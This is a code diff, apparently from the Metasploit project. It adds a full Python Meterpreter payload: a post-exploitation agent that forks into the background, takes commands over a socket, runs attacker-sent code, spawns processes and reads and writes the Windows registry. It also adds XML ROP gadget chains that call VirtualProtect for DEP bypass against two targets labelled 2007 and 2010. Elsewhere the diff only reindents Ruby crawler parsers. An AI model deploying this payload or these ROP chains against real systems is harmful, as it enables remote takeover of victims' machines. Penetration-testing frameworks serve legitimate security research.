+	result = ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None)
+	if result == ERROR_SUCCESS:
+		response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_query_value(request, response):
+	REG_SZ = 1
+	REG_DWORD = 4
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	value_type = ctypes.c_uint32()
+	value_type.value = 0
+	value_data = (ctypes.c_ubyte * 4096)()
+	value_data_sz = ctypes.c_uint32()
+	value_data_sz.value = ctypes.sizeof(value_data)
+	result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
+	if result == ERROR_SUCCESS:
+		response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
+		if value_type.value == REG_SZ:
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
+		elif value_type.value == REG_DWORD:
+			value = value_data[:4]
+			value.reverse()
+			value = ''.join(map(chr, value))
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
+		else:
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_set_value(request, response):
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
+	value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
+	result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_unload_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	result = ctypes.windll.advapi32.RegUnLoadKeyA(root_key, base_key)
+	return result, response
@@ -0,0 +1,433 @@
+#!/usr/bin/python
+import code
+import ctypes
+import os
+import random
+import select
+import socket
+import struct
+import subprocess
+import sys
+import threading
+
+has_windll = hasattr(ctypes, 'windll')
+
+#
+# Constants
+#
+PACKET_TYPE_REQUEST = 0
+PACKET_TYPE_RESPONSE = 1
+PACKET_TYPE_PLAIN_REQUEST = 10
+PACKET_TYPE_PLAIN_RESPONSE = 11
+
+ERROR_SUCCESS = 0
+# not defined in original C implementation
+ERROR_FAILURE = 1
+
+CHANNEL_CLASS_BUFFERED = 0
+CHANNEL_CLASS_STREAM = 1
+CHANNEL_CLASS_DATAGRAM = 2
+CHANNEL_CLASS_POOL = 3
+
+#
+# TLV Meta Types
+#
+TLV_META_TYPE_NONE =       (   0   )
+TLV_META_TYPE_STRING =     (1 << 16)
+TLV_META_TYPE_UINT =       (1 << 17)
+TLV_META_TYPE_RAW =        (1 << 18)
+TLV_META_TYPE_BOOL =       (1 << 19)
+TLV_META_TYPE_COMPRESSED = (1 << 29)
+TLV_META_TYPE_GROUP =      (1 << 30)
+TLV_META_TYPE_COMPLEX =    (1 << 31)
+# not defined in original
+TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
+
+#
+# TLV base starting points
+#
+TLV_RESERVED =   0
+TLV_EXTENSIONS = 20000
+TLV_USER =       40000
+TLV_TEMP =       60000
+
+#
+# TLV Specific Types
+#
+TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
+TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
+TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
+TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
+TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
+
+TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
+TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
+TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
+
+TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
+TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
+TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
+
+TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
+TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
+TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
+TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
+TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
+
+TLV_TYPE_SEEK_WHENCE =         TLV_META_TYPE_UINT   |  70
+TLV_TYPE_SEEK_OFFSET =         TLV_META_TYPE_UINT   |  71
+TLV_TYPE_SEEK_POS =            TLV_META_TYPE_UINT   |  72
+
+TLV_TYPE_EXCEPTION_CODE =      TLV_META_TYPE_UINT   | 300
+TLV_TYPE_EXCEPTION_STRING =    TLV_META_TYPE_STRING | 301
+
+TLV_TYPE_LIBRARY_PATH =        TLV_META_TYPE_STRING | 400
+TLV_TYPE_TARGET_PATH =         TLV_META_TYPE_STRING | 401
+TLV_TYPE_MIGRATE_PID =         TLV_META_TYPE_UINT   | 402
+TLV_TYPE_MIGRATE_LEN =         TLV_META_TYPE_UINT   | 403
+
+TLV_TYPE_CIPHER_NAME =         TLV_META_TYPE_STRING | 500
+TLV_TYPE_CIPHER_PARAMETERS =   TLV_META_TYPE_GROUP  | 501
+
+def generate_request_id():
+	chars = 'abcdefghijklmnopqrstuvwxyz'
+	return ''.join(random.choice(chars) for x in xrange(32))
+
+def packet_get_tlv(pkt, tlv_type):
+	offset = 0
+	while (offset < len(pkt)):
+		tlv = struct.unpack('>II', pkt[offset:offset+8])
+		if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
+			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
+			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+				val = val.split('\x00', 1)[0]
+			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+				val = struct.unpack('>I', val)[0]
+			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
+				val = bool(struct.unpack('b', val)[0])
+			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+				pass
+			return {'type':tlv[1], 'length':tlv[0], 'value':val}
+		offset += tlv[0]
+	return {}
+
+def packet_enum_tlvs(pkt, tlv_type = None):
+	offset = 0
+	while (offset < len(pkt)):
+		tlv = struct.unpack('>II', pkt[offset:offset+8])
+		if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
+			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
+			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+				val = val.split('\x00', 1)[0]
+			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+				val = struct.unpack('>I', val)[0]
+			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
+				val = bool(struct.unpack('b', val)[0])
+			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+				pass
+			yield {'type':tlv[1], 'length':tlv[0], 'value':val}
+		offset += tlv[0]
+	raise StopIteration()
+
+def tlv_pack(*args):
+	if len(args) == 2:
+		tlv = {'type':args[0], 'value':args[1]}
+	else:
+		tlv = args[0]
+	data = ""
+	if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+		data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
+	elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+		data = struct.pack('>III', 12, tlv['type'], tlv['value'])
+	elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
+		data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
+	elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
+	elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
+	elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
+	return data
+
+class STDProcessBuffer(threading.Thread):
+	def __init__(self, std, is_alive):
+		threading.Thread.__init__(self)
+		self.std = std
+		self.is_alive = is_alive
+		self.data = ''
+		self.data_lock = threading.RLock()
+
+	def run(self):
+		while self.is_alive():
+			byte = self.std.read(1)
+			self.data_lock.acquire()
+			self.data += byte
+			self.data_lock.release()
+		data = self.std.read()
+		self.data_lock.acquire()
+		self.data += data
+		self.data_lock.release()
+
+	def is_read_ready(self):
+		return len(self.data) != 0
+
+	def read(self, l = None):
+		data = ''
+		self.data_lock.acquire()
+		if l == None:
+			data = self.data
+			self.data = ''
+		else:
+			data = self.data[0:l]
+			self.data = self.data[l:]
+		self.data_lock.release()
+		return data
+
+class STDProcess(subprocess.Popen):
+	def __init__(self, *args, **kwargs):
+		subprocess.Popen.__init__(self, *args, **kwargs)
+
+	def start(self):
+		self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
+		self.stdout_reader.start()
+		self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
+		self.stderr_reader.start()
+
+class PythonMeterpreter(object):
+	def __init__(self, socket):
+		self.socket = socket
+		self.extension_functions = {}
+		self.channels = {}
+		self.interact_channels = []
+		self.processes = {}
+		for func in filter(lambda x: x.startswith('_core'), dir(self)):
+			self.extension_functions[func[1:]] = getattr(self, func)
+		self.running = True
+
+	def register_function(self, func):
+		self.extension_functions[func.__name__] = func
+
+	def register_function_windll(self, func):
+		if has_windll:
+			self.register_function(func)
+
+	def add_channel(self, channel):
+		idx = 0
+		while idx in self.channels:
+			idx += 1
+		self.channels[idx] = channel
+		return idx
+
+	def add_process(self, process):
+		idx = 0
+		while idx in self.processes:
+			idx += 1
+		self.processes[idx] = process
+		return idx
+
+	def run(self):
+		while self.running:
+			if len(select.select([self.socket], [], [], 0.5)[0]):
+				request = self.socket.recv(8)
+				if len(request) != 8:
+					break
+				req_length, req_type = struct.unpack('>II', request)
+				req_length -= 8
+				request = ''
+				while len(request) < req_length:
+					request += self.socket.recv(4096)
+				response = self.create_response(request)
+				self.socket.send(response)
+			else:
+				channels_for_removal = []
+				channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
+				for channel_id in channel_ids:
+					channel = self.channels[channel_id]
+					data = ''
+					if isinstance(channel, STDProcess):
+						if not channel_id in self.interact_channels:
+							continue
+						if channel.stdout_reader.is_read_ready():
+							data = channel.stdout_reader.read()
+						elif channel.stderr_reader.is_read_ready():
+							data = channel.stderr_reader.read()
+						elif channel.poll() != None:
+							self.handle_dead_resource_channel(channel_id)
+					elif isinstance(channel, socket._socketobject):
+						while len(select.select([channel.fileno()], [], [], 0)[0]):
+							try:
+								d = channel.recv(1)
+							except socket.error:
+								d = ''
+							if len(d) == 0:
+								self.handle_dead_resource_channel(channel_id)
+								break
+							data += d
+					if data:
+						pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
+						pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
+						pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
+						pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
+						pkt  = struct.pack('>I', len(pkt) + 4) + pkt
+						self.socket.send(pkt)
+
+	def handle_dead_resource_channel(self, channel_id):
+		del self.channels[channel_id]
+		if channel_id in self.interact_channels:
+			self.interact_channels.remove(channel_id)
+		pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
+		pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
+		pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
+		pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+		pkt  = struct.pack('>I', len(pkt) + 4) + pkt
+		self.socket.send(pkt)
+
+	def _core_loadlib(self, request, response):
+		data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
+		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
+			return ERROR_FAILURE
+		preloadlib_methods = self.extension_functions.keys()
+		i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
+		i.runcode(compile(data_tlv['value'], '', 'exec'))
+		postloadlib_methods = self.extension_functions.keys()
+		new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
+		for method in new_methods:
+			response += tlv_pack(TLV_TYPE_METHOD, method)
+		return ERROR_SUCCESS, response
+
+	def _core_shutdown(self, request, response):
+		response += tlv_pack(TLV_TYPE_BOOL, True)
+		self.running = False
+		return ERROR_SUCCESS, response
+
+	def _core_channel_open(self, request, response):
+		channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
+		handler = 'channel_create_' + channel_type['value']
+		if handler not in self.extension_functions:
+			return ERROR_FAILURE, response
+		handler = self.extension_functions[handler]
+		return handler(request, response)
+
+	def _core_channel_close(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		if isinstance(channel, file):
+			channel.close()
+		elif isinstance(channel, subprocess.Popen):
+			channel.kill()
+		elif isinstance(s, socket._socketobject):
+			channel.close()
+		else:
+			return ERROR_FAILURE, response
+		del self.channels[channel_id]
+		if channel_id in self.interact_channels:
+			self.interact_channels.remove(channel_id)
+		return ERROR_SUCCESS, response
+
+	def _core_channel_eof(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		result = False
+		if isinstance(channel, file):
+			result = channel.tell() == os.fstat(channel.fileno()).st_size
+		response += tlv_pack(TLV_TYPE_BOOL, result)
+		return ERROR_SUCCESS, response
+
+	def _core_channel_interact(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
+		if toggle:
+			if channel_id in self.interact_channels:
+				self.interact_channels.remove(channel_id)
+			else:
+				self.interact_channels.append(channel_id)
+		elif channel_id in self.interact_channels:
+			self.interact_channels.remove(channel_id)
+		return ERROR_SUCCESS, response
+
+	def _core_channel_read(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		data = ''
+		if isinstance(channel, file):
+			data = channel.read(length)
+		elif isinstance(channel, STDProcess):
+			if channel.poll() != None:
+				self.handle_dead_resource_channel(channel_id)
+			if channel.stdout_reader.is_read_ready():
+				data = channel.stdout_reader.read(length)
+		elif isinstance(s, socket._socketobject):
+			data = channel.recv(length)
+		else:
+			return ERROR_FAILURE, response
+		response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
+		return ERROR_SUCCESS, response
+
+	def _core_channel_write(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
+		length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		l = len(channel_data)
+		if isinstance(channel, file):
+			channel.write(channel_data)
+		elif isinstance(channel, subprocess.Popen):
+			if channel.poll() != None:
+				self.handle_dead_resource_channel(channel_id)
+				return ERROR_FAILURE, response
+			channel.stdin.write(channel_data)
+		elif isinstance(s, socket._socketobject):
+			try:
+				l = channel.send(channel_data)
+			except socket.error:
+				channel.close()
+				self.handle_dead_resource_channel(channel_id)
+				return ERROR_FAILURE, response
+		else:
+			return ERROR_FAILURE, response
+		response += tlv_pack(TLV_TYPE_LENGTH, l)
+		return ERROR_SUCCESS, response
+
+	def create_response(self, request):
+		resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
+		method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
+		resp += tlv_pack(method_tlv)
+
+		reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
+		resp += tlv_pack(reqid_tlv)
+
+		handler_name = method_tlv['value']
+		if handler_name in self.extension_functions:
+			handler = self.extension_functions[handler_name]
+			try:
+				#print("[*] running method {0}".format(handler_name))
+				result, resp = handler(request, resp)
+			except Exception, err:
+				#print("[-] method {0} resulted in an error".format(handler_name))
+				result = ERROR_FAILURE
+		else:
+			#print("[-] method {0} was requested but does not exist".format(handler_name))
+			result = ERROR_FAILURE
+		resp += tlv_pack(TLV_TYPE_RESULT, result)
+		resp = struct.pack('>I', len(resp) + 4) + resp
+		return resp
+
+if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
+	if hasattr(os, 'setsid'):
+		os.setsid()
+	met = PythonMeterpreter(s)
+	met.run()
@@ -18,29 +18,29 @@ require 'uri'

 class CrawlerSimple < BaseParser

-	def parse(request,result)
+  def parse(request,result)

-		if !result['Content-Type'].include? "text/html"
-			return
-		end
+    if !result['Content-Type'].include? "text/html"
+      return
+    end

-		doc = Hpricot(result.body.to_s)
-		doc.search('a').each do |link|
+    doc = Hpricot(result.body.to_s)
+    doc.search('a').each do |link|

-		hr = link.attributes['href']
+    hr = link.attributes['href']

-		if hr and !hr.match(/^(\#|javascript\:)/)
-			begin
-				hreq = urltohash('GET',hr,request['uri'],nil)
+    if hr and !hr.match(/^(\#|javascript\:)/)
+      begin
+        hreq = urltohash('GET',hr,request['uri'],nil)

-				insertnewpath(hreq)
+        insertnewpath(hreq)

-			rescue URI::InvalidURIError
-				#puts "Parse error"
-				#puts "Error: #{link[0]}"
-			end
-		end
-		end
-	end
+      rescue URI::InvalidURIError
+        #puts "Parse error"
+        #puts "Error: #{link[0]}"
+      end
+    end
+    end
+  end
 end

@@ -18,60 +18,60 @@ require 'uri'

 class CrawlerForms < BaseParser

-	def parse(request,result)
+  def parse(request,result)

-		if !result['Content-Type'].include? "text/html"
-			return
-		end
+    if !result['Content-Type'].include? "text/html"
+      return
+    end

-		hr = ''
-		m = ''
+    hr = ''
+    m = ''

-		doc = Hpricot(result.body.to_s)
-		doc.search('form').each do |f|
-			hr = f.attributes['action']
+    doc = Hpricot(result.body.to_s)
+    doc.search('form').each do |f|
+      hr = f.attributes['action']

-			fname = f.attributes['name']
-			if fname.empty?
-				fname = "NONE"
-			end
+      fname = f.attributes['name']
+      if fname.empty?
+        fname = "NONE"
+      end

-			m = "GET"
-			if !f.attributes['method'].empty?
-				m = f.attributes['method'].upcase
-			end
+      m = "GET"
+      if !f.attributes['method'].empty?
+        m = f.attributes['method'].upcase
+      end

-			#puts "Parsing form name: #{fname} (#{m})"
+      #puts "Parsing form name: #{fname} (#{m})"

-			htmlform = Hpricot(f.inner_html)
+      htmlform = Hpricot(f.inner_html)

-			arrdata = []
+      arrdata = []

-			htmlform.search('input').each do |p|
-				#puts p.attributes['name']
-				#puts p.attributes['type']
-				#puts p.attributes['value']
+      htmlform.search('input').each do |p|
+        #puts p.attributes['name']
+        #puts p.attributes['type']
+        #puts p.attributes['value']

-				#raw_request has uri_encoding disabled as it encodes '='.
-				arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
-			end
+        #raw_request has uri_encoding disabled as it encodes '='.
+        arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
+      end

-			data = arrdata.join("&").to_s
+      data = arrdata.join("&").to_s


-			begin
-				hreq = urltohash(m,hr,request['uri'],data)
+      begin
+        hreq = urltohash(m,hr,request['uri'],data)

-				hreq['ctype'] = 'application/x-www-form-urlencoded'
+        hreq['ctype'] = 'application/x-www-form-urlencoded'

-				insertnewpath(hreq)
+        insertnewpath(hreq)


-			rescue URI::InvalidURIError
-				#puts "Parse error"
-				#puts "Error: #{link[0]}"
-			end
-		end
-	end
+      rescue URI::InvalidURIError
+        #puts "Parse error"
+        #puts "Error: #{link[0]}"
+      end
+    end
+  end
 end

@@ -14,28 +14,28 @@ require 'uri'

 class CrawlerFrames < BaseParser

-	def parse(request,result)
+  def parse(request,result)

-		if !result['Content-Type'].include? "text/html"
-			return
-		end
+    if !result['Content-Type'].include? "text/html"
+      return
+    end

-		doc = Hpricot(result.body.to_s)
-		doc.search('iframe').each do |ifra|
+    doc = Hpricot(result.body.to_s)
+    doc.search('iframe').each do |ifra|

-		ir = ifra.attributes['src']
+    ir = ifra.attributes['src']

-		if ir and !ir.match(/^(\#|javascript\:)/)
-			begin
-				hreq = urltohash('GET',ir,request['uri'],nil)
+    if ir and !ir.match(/^(\#|javascript\:)/)
+      begin
+        hreq = urltohash('GET',ir,request['uri'],nil)

-				insertnewpath(hreq)
+        insertnewpath(hreq)

-			rescue URI::InvalidURIError
-				#puts "Error"
-			end
-		end
-		end
-	end
+      rescue URI::InvalidURIError
+        #puts "Error"
+      end
+    end
+    end
+  end
 end

@@ -15,29 +15,29 @@ require 'uri'

 class CrawlerImage < BaseParser

-	def parse(request,result)
+  def parse(request,result)

-		if !result['Content-Type'].include? "text/html"
-			return
-		end
+    if !result['Content-Type'].include? "text/html"
+      return
+    end

-		doc = Hpricot(result.body.to_s)
-		doc.search('img').each do |i|
+    doc = Hpricot(result.body.to_s)
+    doc.search('img').each do |i|

-		im = i.attributes['src']
+    im = i.attributes['src']

-		if im and !im.match(/^(\#|javascript\:)/)
-			begin
-				hreq = urltohash('GET',im,request['uri'],nil)
+    if im and !im.match(/^(\#|javascript\:)/)
+      begin
+        hreq = urltohash('GET',im,request['uri'],nil)

-				insertnewpath(hreq)
+        insertnewpath(hreq)

-			rescue URI::InvalidURIError
-				#puts "Parse error"
-				#puts "Error: #{i[0]}"
-			end
-		end
-		end
-	end
+      rescue URI::InvalidURIError
+        #puts "Parse error"
+        #puts "Error: #{i[0]}"
+      end
+    end
+    end
+  end
 end

@@ -15,29 +15,29 @@ require 'uri'

 class CrawlerLink < BaseParser

-	def parse(request,result)
+  def parse(request,result)

-		if !result['Content-Type'].include? "text/html"
-			return
-		end
+    if !result['Content-Type'].include? "text/html"
+      return
+    end

-		doc = Hpricot(result.body.to_s)
-		doc.search('link').each do |link|
+    doc = Hpricot(result.body.to_s)
+    doc.search('link').each do |link|

-		hr = link.attributes['href']
+    hr = link.attributes['href']

-		if hr and !hr.match(/^(\#|javascript\:)/)
-			begin
-				hreq = urltohash('GET',hr,request['uri'],nil)
+    if hr and !hr.match(/^(\#|javascript\:)/)
+      begin
+        hreq = urltohash('GET',hr,request['uri'],nil)

-				insertnewpath(hreq)
+        insertnewpath(hreq)

-			rescue URI::InvalidURIError
-				#puts "Parse error"
-				#puts "Error: #{link[0]}"
-			end
-		end
-		end
-	end
+      rescue URI::InvalidURIError
+        #puts "Parse error"
+        #puts "Error: #{link[0]}"
+      end
+    end
+    end
+  end
 end

@@ -18,31 +18,31 @@ require 'uri'

 class CrawlerObjects < BaseParser

-	def parse(request,result)
+  def parse(request,result)

-		if !result['Content-Type'].include? "text/html"
-			return
-		end
+    if !result['Content-Type'].include? "text/html"
+      return
+    end

-		hr = ''
-		m = ''
+    hr = ''
+    m = ''

-		doc = Hpricot(result.body.to_s)
-		doc.search("//object/embed").each do |obj|
+    doc = Hpricot(result.body.to_s)
+    doc.search("//object/embed").each do |obj|

-			s = obj['src']
+      s = obj['src']

-			begin
-				hreq = urltohash('GET',s,request['uri'],nil)
+      begin
+        hreq = urltohash('GET',s,request['uri'],nil)

-				insertnewpath(hreq)
+        insertnewpath(hreq)


-			rescue URI::InvalidURIError
-				#puts "Parse error"
-				#puts "Error: #{link[0]}"
-			end
-		end
-	end
+      rescue URI::InvalidURIError
+        #puts "Parse error"
+        #puts "Error: #{link[0]}"
+      end
+    end
+  end
 end

@@ -18,31 +18,31 @@ require 'uri'

 class CrawlerScripts < BaseParser

-	def parse(request,result)
+  def parse(request,result)

-		if !result['Content-Type'].include? "text/html"
-			return
-		end
+    if !result['Content-Type'].include? "text/html"
+      return
+    end

-		hr = ''
-		m = ''
+    hr = ''
+    m = ''

-		doc = Hpricot(result.body.to_s)
-		doc.search("//script").each do |obj|
+    doc = Hpricot(result.body.to_s)
+    doc.search("//script").each do |obj|

-			s = obj['src']
+      s = obj['src']

-			begin
-				hreq = urltohash('GET',s,request['uri'],nil)
+      begin
+        hreq = urltohash('GET',s,request['uri'],nil)

-				insertnewpath(hreq)
+        insertnewpath(hreq)


-			rescue URI::InvalidURIError
-				#puts "Parse error"
-				#puts "Error: #{link[0]}"
-			end
-		end
-	end
+      rescue URI::InvalidURIError
+        #puts "Parse error"
+        #puts "Error: #{link[0]}"
+      end
+    end
+  end
 end

@@ -0,0 +1,66 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>2007</target>
+	</compatibility>
+
+	<gadgets base="0x51bd0000">
+		<gadget offset="0x000750fd">POP EAX # RETN</gadget>
+		<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0001803c">POP EBP # RETN</gadget>
+		<gadget offset="0x0001803c">skip 4 bytes</gadget>
+		<gadget offset="0x0001750f">POP EBX # RETN</gadget>
+		<gadget value="safe_negate_size">Safe size to NEG</gadget>
+		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
+		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
+		<gadget value="ffffffc0">0x00000040</gadget>
+		<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
+		<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x000406e9">POP ECX # RETN</gadget>
+		<gadget offset="0x0008bfae">Writable location</gadget>
+		<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
+		<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
+		<gadget offset="0x0002c840">JMP [EAX]</gadget>
+		<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
+		<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>2010</target>
+	</compatibility>
+
+	<gadgets base="0x51bd0000">
+		<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
+		<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
+		<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
+		<gadget value="safe_negate_size">Safe size to NEG</gadget>
+		<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0002a429">POP EDX # RETN</gadget>
+		<gadget value="ffffffc0">0x00000040</gadget>
+		<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
+		<gadget offset="0x0008c638">Writable location</gadget>
+		<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
+		<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
+		<gadget offset="0x00073335">POP ESI # RETN</gadget>
+		<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
+		<gadget offset="0x00076452">POP EAX # RETN</gadget>
+		<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
+		<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
+</gadgets>
+</rop>
+</db>
@@ -9,7 +9,7 @@
 		<gadget offset="0x00024c66">POP EBP # RETN</gadget>
 		<gadget offset="0x00024c66">skip 4 bytes</gadget>
 		<gadget offset="0x00004edc">POP EAX # RETN</gadget>
-		<gadget value="FFFFFBFF">0x00000201</gadget>
+		<gadget value="safe_negate_size">0x00000201</gadget>
